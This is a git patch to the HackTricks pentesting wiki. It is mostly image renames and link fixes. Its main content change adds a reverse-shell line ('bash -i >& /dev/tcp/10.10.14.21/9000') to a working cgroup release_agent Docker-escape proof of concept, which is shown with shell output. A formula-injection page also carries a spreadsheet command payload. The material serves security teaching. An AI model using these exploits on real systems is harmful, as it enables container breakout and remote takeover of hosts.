From 96d7f39ffb56379f5a8d5b7e202778310d14ae92 Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 15 Dec 2020 09:03:34 +0000 Subject: [PATCH] GitBook: [master] 9 pages and 27 assets modified --- .../assets/{1 (2).png => 1 (2) (1) (1).png} | Bin ...6e67655f696d672e706e67 (6) (4) (6) (1).png | Bin 0 -> 1502 bytes ...2) (1).png => image (107) (2) (2) (1).png} | Bin ...7) (2).png => image (107) (2) (2) (2).png} | Bin ...1) (1).png => image (121) (1) (1) (1).png} | Bin .../{image (343).png => image (207) (2).png} | Bin ...7) (1).png => image (227) (1) (1) (1).png} | Bin .../{image (61).png => image (25) (1).png} | Bin .../{image (67).png => image (25) (2).png} | Bin .../{image (172).png => image (253) (1).png} | Bin ...4) (1).png => image (254) (1) (1) (1).png} | Bin ...2) (1).png => image (345) (2) (2) (1).png} | Bin ...5) (2).png => image (345) (2) (2) (2).png} | Bin .../{image (73).png => image (95) (1).png} | Bin 1911-pentesting-fox.md | 2 +- README.md | 14 +++++------ .../escaping-from-a-docker-container.md | 22 +++++++++++------- .../exploiting-content-providers.md | 4 ++-- pentesting-web/formula-injection.md | 2 +- pentesting/pentesting-web/drupal.md | 2 +- pentesting/pentesting-web/wordpress.md | 2 +- reversing/cryptographic-algorithms/README.md | 4 ++-- ...rivileged-accounts-and-token-privileges.md | 2 +- 23 files changed, 29 insertions(+), 25 deletions(-) rename .gitbook/assets/{1 (2).png => 1 (2) (1) (1).png} (100%) create mode 100644 .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6) (1).png rename .gitbook/assets/{image (107) (2) (1).png => image (107) (2) (2) (1).png} (100%) rename .gitbook/assets/{image (107) (2).png => image (107) (2) (2) (2).png} (100%) rename .gitbook/assets/{image (121) (1).png => image (121) (1) (1) (1).png} (100%) rename .gitbook/assets/{image (343).png => image (207) (2).png} (100%) rename .gitbook/assets/{image (227) (1).png => image (227) (1) (1) (1).png} (100%) rename .gitbook/assets/{image (61).png => image (25) (1).png} (100%) rename .gitbook/assets/{image (67).png => image (25) (2).png} (100%) rename .gitbook/assets/{image (172).png => image (253) (1).png} (100%) rename .gitbook/assets/{image (254) (1).png => image (254) (1) (1) (1).png} (100%) rename .gitbook/assets/{image (345) (2) (1).png => image (345) (2) (2) (1).png} (100%) rename .gitbook/assets/{image (345) (2).png => image (345) (2) (2) (2).png} (100%) rename .gitbook/assets/{image (73).png => image (95) (1).png} (100%) diff --git a/.gitbook/assets/1 (2).png b/.gitbook/assets/1 (2) (1) (1).png similarity index 100% rename from .gitbook/assets/1 (2).png rename to .gitbook/assets/1 (2) (1) (1).png diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6) (1).png new file mode 100644 index 0000000000000000000000000000000000000000..4c4968b48f0ebf20a73e46cd07c9315dc629c00c GIT binary patch literal 1502 zcmV<41tI#0P)O}P0RNd|v9YnQudnZ?9RH*M z|B+Y!p8)@kQ~!)n|BO%nn*jfdPXCHc|A|chiA(>8O82_ME`?B|ARvR zf5yUXqm38Abi#$x94+_wSpM&m`*Z*GIHFl|p&O65#5k%QvJu2Y>v!(8I?EcNQZGLg~u( zv^h#zNhUuw>eb0)vL$Kn+gBEP^N0JRA$h;q;whs#8mWb2qi#)Zd^(YIe>y^a`_XhX z1bp3CPTLQ1q7<>mM!huo?Bj`~dwZ`gP(S!{=Lo8#cziqP;&YNE9$6TOQawbVjh&S|SSUIvc>`V@ND4iwhrCk_rd{R$*KSDKnf*tjSm09Qp;n+!g0?1?l!iD*as#*m zFr7LB^JMV=6#Y%WKvZi0sN;YdB-H>h0fd!ib#wOK#gVr6$Edw(IV#l{6_k?7AaNsb`N5=vr;YmR}c{fmsWy|;K$fpN}4G(>rv z42{$o%6Za}h5iAO)k$-YYq97tA)A)DH({exg@A1k5z&s3zQ19N+4OBRM4YJ@&q-2wUkl| zQ7Qq`s?RddD%9J%W7OGKy0Ud`Zq-pzmy_em`J>Y5s zrqQenSPoR1HAcEk|vu zPWtV;;jDV=r|HVWGnr==Fl~~$x^9nEtwc|O>kLv`HJy~|I<2Z#9YLBt7*OANbZ_NE z9&1llYdKZOq+)$8>i)c{+FLnKee&Oe&VX0F z^gXB22=cwBo`^L@No`!x7+I(G+B!8Y*Qgb|HVyWF0T{|tnTG-h82|tP07*qoM6N<$ Ef}*3!D*ylh literal 0 HcmV?d00001 diff --git a/.gitbook/assets/image (107) (2) (1).png b/.gitbook/assets/image (107) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (107) (2) (1).png rename to .gitbook/assets/image (107) (2) (2) (1).png diff --git a/.gitbook/assets/image (107) (2).png b/.gitbook/assets/image (107) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (107) (2).png rename to .gitbook/assets/image (107) (2) (2) (2).png diff --git a/.gitbook/assets/image (121) (1).png b/.gitbook/assets/image (121) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (121) (1).png rename to .gitbook/assets/image (121) (1) (1) (1).png diff --git a/.gitbook/assets/image (343).png b/.gitbook/assets/image (207) (2).png similarity index 100% rename from .gitbook/assets/image (343).png rename to .gitbook/assets/image (207) (2).png diff --git a/.gitbook/assets/image (227) (1).png b/.gitbook/assets/image (227) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (227) (1).png rename to .gitbook/assets/image (227) (1) (1) (1).png diff --git a/.gitbook/assets/image (61).png b/.gitbook/assets/image (25) (1).png similarity index 100% rename from .gitbook/assets/image (61).png rename to .gitbook/assets/image (25) (1).png diff --git a/.gitbook/assets/image (67).png b/.gitbook/assets/image (25) (2).png similarity index 100% rename from .gitbook/assets/image (67).png rename to .gitbook/assets/image (25) (2).png diff --git a/.gitbook/assets/image (172).png b/.gitbook/assets/image (253) (1).png similarity index 100% rename from .gitbook/assets/image (172).png rename to .gitbook/assets/image (253) (1).png diff --git a/.gitbook/assets/image (254) (1).png b/.gitbook/assets/image (254) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (254) (1).png rename to .gitbook/assets/image (254) (1) (1) (1).png diff --git a/.gitbook/assets/image (345) (2) (1).png b/.gitbook/assets/image (345) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (345) (2) (1).png rename to .gitbook/assets/image (345) (2) (2) (1).png diff --git a/.gitbook/assets/image (345) (2).png b/.gitbook/assets/image (345) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (345) (2).png rename to .gitbook/assets/image (345) (2) (2) (2).png diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (95) (1).png similarity index 100% rename from .gitbook/assets/image (73).png rename to .gitbook/assets/image (95) (1).png diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 5864e38da..d817c8317 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](.gitbook/assets/image%20%28182%29.png) -![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png) +![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29.png) InfluxDB diff --git a/README.md b/README.md index e847ee72f..004886680 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,5 @@ # HackTricks - - ![](.gitbook/assets/portada-alcoholica.png) **Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.** @@ -14,14 +12,14 @@ Here you will find the **typical flow** that **you should follow when pentesting **Click in the title to start!** -If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [πŸ’¬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. -Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. - - +If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book. +Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book. ![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* -Creative Commons License
Copyright Β© Carlos Polop 2020. Except where otherwise specified, the text on HACK TRICKS by Carlos Polop is licensed under the Creative Commons Attribution-ShareAlike License 4.0 (International) (CC-BY-SA 4.0). + +Copyright Β© Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [Creative Commons Attribution-ShareAlike License 4.0 \(International\) \(CC-BY-SA 4.0\)](https://creativecommons.org/licenses/by-sa/4.0/). + diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md index 77336660c..ea3594922 100644 --- a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md +++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md @@ -29,10 +29,17 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent - + +#For a normal PoC ================= echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd chmod a+x /cmd +#=================================== +#Reverse shell +echo '#!/bin/bash' > /cmd +echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd +chmod a+x /cmd +#=================================== sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" head /output @@ -58,7 +65,7 @@ A container would be vulnerable to this technique if run with the flags: `--secu Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works. -To trigger this exploit we need a cgroup where we can create a `release_agent` file _and_ trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup. +To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup. To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named β€œx” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers. @@ -68,7 +75,7 @@ Note that cgroup controllers are global resources that can be mounted multiple t We can see the β€œx” child cgroup creation and its directory listing below. -```bash +```text root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x root@b11cf9eab4fd:/# ls /tmp/cgrp/ cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x @@ -82,7 +89,7 @@ The files we add or modify in the container are present on the host, and it is p Those operations can be seen below: -```bash +```text root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent @@ -90,14 +97,14 @@ root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent Note the path to the `/cmd` script, which we are going to create on the host: -```bash +```text root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd ``` Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents: -```bash +```text root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd root@b11cf9eab4fd:/# chmod a+x /cmd @@ -108,7 +115,7 @@ ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c7 Finally, we can execute the attack by spawning a process that immediately ends inside the β€œx” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in β€œx” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container: -```bash +```text root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" root@b11cf9eab4fd:/# head /output USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND @@ -121,7 +128,6 @@ root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq] root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0] root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched] root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0] - ``` ## `--privileged` flag v2 diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 1cfb83f09..7479cb639 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/ You should also check the **ContentProvider code** to search for queries: -![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29%20%281%29.png) Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method: @@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n ![](../../../.gitbook/assets/image%20%28211%29.png) -![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29.png) Because you will be able to call them diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index 532e5ac56..b0c0c3fb7 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](../.gitbook/assets/image%20%2861%29.png) +![](../.gitbook/assets/image%20%2825%29%20%281%29.png) diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md index 93eb6726f..e494f17e6 100644 --- a/pentesting/pentesting-web/drupal.md +++ b/pentesting/pentesting-web/drupal.md @@ -24,7 +24,7 @@ Accessing _/user/<number>_ you can see the number of existing users, in th ![](../../.gitbook/assets/image%20%2826%29.png) -![](../../.gitbook/assets/image%20%28227%29%20%281%29.png) +![](../../.gitbook/assets/image%20%28227%29%20%281%29%20%281%29.png) ## Hidden pages enumeration diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index 919054def..549537803 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](../../.gitbook/assets/image%20%28107%29%20%282%29.png) +![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29.png) ![](../../.gitbook/assets/image%20%28224%29.png) diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md index 98ec86585..7c53b5e9d 100644 --- a/reversing/cryptographic-algorithms/README.md +++ b/reversing/cryptographic-algorithms/README.md @@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha Note the use of more constants -![](../../.gitbook/assets/image%20%28172%29.png) +![](../../.gitbook/assets/image%20%28253%29.png) ## CRC \(hash\) @@ -177,7 +177,7 @@ A CRC hash algorithm looks like: The graph is quiet large: -![](../../.gitbook/assets/image%20%28343%29.png) +![](../../.gitbook/assets/image%20%28207%29%20%282%29.png) Check **3 comparisons to recognise it**: diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md index de64c241d..b9b0802ac 100644 --- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md +++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md @@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha Note the spotless' user membership: -![](../../.gitbook/assets/1%20%282%29%20%281%29.png) +![](../../.gitbook/assets/1%20%282%29%20%281%29%20%281%29.png) However, we can still add new users: